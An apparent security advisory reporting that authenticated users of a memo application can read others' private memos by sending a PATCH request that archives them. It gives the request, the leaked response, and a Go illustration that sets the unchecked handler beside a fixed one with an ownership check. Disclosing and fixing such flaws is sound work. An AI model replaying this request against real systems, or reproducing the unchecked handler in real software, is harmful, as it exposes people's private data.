
View the content of any private memo from other users

# Description
Any authenticated user can view the content of other users' private memos via the API:
```
PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}
```

# Proof of Concept
Log in to the website in browser 1 as user A.
Log in to the website in browser 2 as user B.
Example: user B has a private memo with id 8.

With the session in browser 1 (user A), make the request:

```
PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}
```

User A then receives the response:
```
{
  "data": {
    "id": 8,
    "rowStatus": "ARCHIVED",
    "creatorId": 1,
    "createdTs": 1671805207,
    "updatedTs": 1671805219,
    "content": "demo content",
    "visibility": "PRIVATE",
    "pinned": false,
    "displayTs": 1671805207,
    "creator": {
      "id": 1,
      "rowStatus": "NORMAL",
      "createdTs": 1671803462,
      "updatedTs": 1671803845,
      "username": "userB",
      "role": "HOST",
      "email": "",
      "nickname": "userB",
      "openId": "",
      "userSettingList": null
    },
    "resourceList": []
  }
}
```
The content of the memo appears in the returned response: `"content":"demo content"`.
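The root cause is a missing object-level authorization check: the PATCH handler trusts the memo id, never compares the memo's owner with the authenticated session, and then echoes the full record (content included) back to the caller. The following Go snippet is an added illustration, not the project's own code; it places that vulnerable pattern beside a fixed handler that compares `creatorId` with the requesting user before mutating or returning anything. The in-memory store, the function names and user A's id (2) are assumptions constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
)

// Memo mirrors the fields visible in the report's response body.
type Memo struct {
	ID, CreatorID                  int
	RowStatus, Content, Visibility string
}

var ErrNotFound = errors.New("memo not found")
var ErrForbidden = errors.New("memo belongs to another user")

// newStore is a constructed in-memory stand-in for the database:
// user B (id 1) owns private memo 8, as in the proof of concept.
func newStore() map[int]*Memo {
	return map[int]*Memo{8: {ID: 8, CreatorID: 1, RowStatus: "NORMAL", Content: "demo content", Visibility: "PRIVATE"}}
}

// patchMemoVulnerable is the pattern the report describes: it trusts the memo id, ignores the caller and echoes the record back.
func patchMemoVulnerable(store map[int]*Memo, requesterID, memoID int, rowStatus string) (*Memo, error) {
	m, ok := store[memoID]
	if !ok {
		return nil, ErrNotFound
	}
	m.RowStatus = rowStatus
	return m, nil
}

// patchMemoFixed checks creatorId against the authenticated user before anything is mutated or returned.
func patchMemoFixed(store map[int]*Memo, requesterID, memoID int, rowStatus string) (*Memo, error) {
	m, ok := store[memoID]
	if !ok {
		return nil, ErrNotFound
	}
	if m.CreatorID != requesterID {
		return nil, ErrForbidden
	}
	m.RowStatus = rowStatus
	return m, nil
}

func main() { // user A (assumed id 2) sends the PoC request against user B's memo 8
	m, _ := patchMemoVulnerable(newStore(), 2, 8, "ARCHIVED")
	_, err := patchMemoFixed(newStore(), 2, 8, "ARCHIVED")
	fmt.Printf("vulnerable handler leaked %q; fixed handler: %v\n", m.Content, err)
}
```

The same ownership check belongs on every per-object route (GET, PATCH, DELETE), and a rejected request must leave the row untouched.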

Demo video: [https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view](https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view)
